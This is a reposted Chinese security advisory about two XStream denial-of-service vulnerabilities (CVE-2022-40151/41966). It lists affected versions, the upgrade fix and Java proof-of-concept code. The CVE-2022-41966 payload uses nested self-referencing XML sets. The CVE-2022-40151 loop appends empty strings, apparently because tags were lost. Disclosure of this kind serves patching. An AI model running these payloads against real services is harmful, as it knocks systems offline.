XStream 拒绝服务漏洞(CVE-2022-40151/41966)

admin 2023年1月9日22:39:23安全漏洞评论30 views1321字阅读4分24秒阅读模式

XStream 拒绝服务漏洞(CVE-2022-40151/41966)





XStream 多个拒绝服务漏洞及POC

CVE-2022-40151/41966




XStream 拒绝服务漏洞(CVE-2022-40151/41966)

XStream是Java类库,用来将对象序列化成XML (JSON)或反序列化为对象。XStream是自由软件,可以在BSD许可证的许可下分发。
日前,XStream官方通报XStream两个拒绝服务漏洞,分别为CVE-2022-40151和CVE-2022-41966,漏洞影响1.4.19及以前的XStream版本,漏洞等级高危。




XStream 拒绝服务漏洞(CVE-2022-40151/41966)





NO.1


漏洞描述


XStream 拒绝服务漏洞(CVE-2022-40151/41966)
XStream受影响版本在解析特定的字符串时,会造成拒绝服务。官方已经给出测试POC:
1、导入受影响的XStream版本:
    创建Maven项目,在pom.xml的dependencies中引入受影响的XStream版本。
<dependency>    <groupId>com.thoughtworks.xstream</groupId>    <artifactId>xstream</artifactId>    <version>1.4.18</version></dependency>
2、导入XStream并使用POC进行测试:
导入:
import com.thoughtworks.xstream.XStream;

CVE-2022-40151:
package org.example;
import com.thoughtworks.xstream.XStream;
public class Main { public static void main(String[] args) {
String xml = new String(); int i = 0; for( ; i < 10000; ++i) { xml += ""; } for( ; i > 0; --i) { xml += ""; } XStream xstream = new XStream(); xstream.fromXML(xml); }}
CVE-2022-41966:
替换待解析的字符串为
xml = "<set>n" +      "  <set>n" +      "    <set>n" +      "      <set>n" +      "        <set>n" +      "          <set>n" +      "            <set>n" +      "              <string>a</string>n" +      "            </set>n" +      "            <set>n" +      "              <string>b</string>n" +      "            </set>n" +      "          </set>n" +      "          <set>n" +      "            <string>c</string>n" +      "            <set reference='../../../set/set[2]'/>n" +      "          </set>n" +      "        </set>n" +      "      </set>n" +      "    </set>n" +      "  </set>n" +      "</set>";

运行后可看到CPU使用率的明显飙升。

XStream 拒绝服务漏洞(CVE-2022-40151/41966)




NO.2


漏洞影响范围


XStream 拒绝服务漏洞(CVE-2022-40151/41966)

XStream <= 1.4.19





NO.3


修复方案


XStream 拒绝服务漏洞(CVE-2022-40151/41966)
官方已发布XStream 1.4.20,请相关使用者及时更新XStream版本到1.4.20。





NO.4


参考链接


XStream 拒绝服务漏洞(CVE-2022-40151/41966)
http://x-stream.github.io/CVE-2022-40151.html
http://x-stream.github.io/CVE-2022-41966.html


XStream 拒绝服务漏洞(CVE-2022-40151/41966)


原文始发于微信公众号(锋刃科技):XStream 拒绝服务漏洞(CVE-2022-40151/41966)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月9日22:39:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  XStream 拒绝服务漏洞(CVE-2022-40151/41966) http://cn-sec.com/archives/1506592.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: